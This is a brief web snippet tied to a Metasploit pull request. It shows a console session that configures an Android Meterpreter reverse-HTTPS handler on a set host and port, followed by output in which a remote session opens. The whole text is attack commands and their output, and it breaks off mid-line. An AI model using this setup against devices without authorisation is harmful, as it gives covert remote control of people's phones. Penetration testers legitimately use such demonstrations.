github.com/rapid7/metasploit-framework/pull/3039

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_https PAYLOAD => android/meterpreter/reverse_https msf exploit(handler) > set LHOST 10.0.0.1 LHOST => 10.0.0.1 msf exploit(handler) > set LPORT 2222 LPORT => 2222 msf exploit(handler) > exploit

[] Started HTTPS reverse handler on https://0.0.0.0:2222/ [*] Starting the payload handler... [] 10.0.0.101:43620 Request received for /TAvM_4CurVL8LMrbIqy3V... [*] Meterpreter session 1 opened (10.0.0.1:2222 -> 10....


Comments (0)

Sign in to post comments.